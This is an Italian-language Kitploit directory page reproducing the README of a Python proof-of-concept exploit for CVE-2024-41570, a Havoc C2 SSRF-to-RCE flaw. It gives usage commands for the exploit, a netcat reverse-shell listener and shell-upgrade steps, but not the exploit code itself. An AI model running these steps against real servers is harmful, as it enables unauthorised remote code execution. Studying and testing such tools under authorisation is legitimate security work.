Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-41570 — Exploit automatizzato di reverse shell tramite WebSocket | Havoc-C2-SSRF con RCE | Kitploit
Strumenti/GitHubGitHub/diemoeve/cve-2024-41570
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed TeamingStrumento di Accesso Remoto
GitHubdiemoeve/cve-2024-41570

CVE-2024-41570

Exploit automatizzato di reverse shell tramite WebSocket | Havoc-C2-SSRF con RCE

Vedi Repository
122181 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-41570 | Havoc C2 SSRF con RCE | Exploit automatizzato di Reverse Shell via WebSocket

Questo progetto fornisce uno script proof-of-concept (PoC) basato su Python per sfruttare un servizio vulnerabile basato su WebSocket. Lo script automatizza la registrazione dell'agente, la consegna del payload WebSocket e l'esecuzione remota dei comandi per stabilire una reverse shell.

Funzionalità

  • Registra un agente presso il servizio di destinazione.
  • Apre un WebSocket e invia i payload di handshake e autenticazione.
  • Esegue comandi da remoto tramite una reverse shell.
  • Fornisce un flusso di lavoro guidato con istruzioni chiare.

Prerequisiti

  • Python 3.x installato sulla tua macchina.
  • Installare le dipendenze richieste eseguendo:
    pip install -r requirements.txt
    

Installazione

  1. Clona questo repository:
    git clone https://github.com/kit4py/CVE-2024-41570.git
    
  2. Naviga nella directory del progetto:
    cd CVE-2024-41570
    
  3. Installa le dipendenze:
    pip install -r requirements.txt
    

Utilizzo

Esegui lo script con gli argomenti richiesti:

python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>

Argomenti

  • -t: URL di destinazione del server WebSocket.
  • -i: Indirizzo IP del Team Server di Havoc.
  • -p: Porta del Team Server di Havoc.
  • -U: Nome utente per l'autenticazione WebSocket.
  • -P: Password per l'autenticazione WebSocket.
  • -l: IP del listener per la reverse shell (la tua macchina).
  • -L: Porta del listener per la reverse shell (la tua macchina).

Comando di Esempio

python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444

Passaggi per l'Esecuzione

  1. Assicurati che il servizio di destinazione sia in esecuzione e vulnerabile.
  2. Esegui lo script con i parametri richiesti.
  3. In un terminale separato, avvia un listener:
    nc -lvnp <listener_port>
    
  4. Migliora la shell:
    python -c 'import pty; pty.spawn("/bin/bash")' 
    export TERM=xterm-256color
    stty rows 67 columns 318
    

Dipendenze

Lo script richiede le seguenti librerie Python:

  • requests
  • pycryptodome

Installale usando il comando:

pip install -r requirements.txt

Avviso di Sicurezza

Questo script è destinato esclusivamente a scopi educativi. Assicurati di avere un'autorizzazione esplicita per testare il sistema di destinazione. L'uso improprio di questo script può violare leggi e linee guida etiche.

Riferimenti

Ispirato da Default Havoc Poc

Contributi

I contributi sono benvenuti! Sentiti libero di fare il fork del repository e inviare una pull request.

Licenza

Questo progetto è concesso in licenza sotto la MIT License. Vedi il file LICENSE per i dettagli.

Scarica lo strumento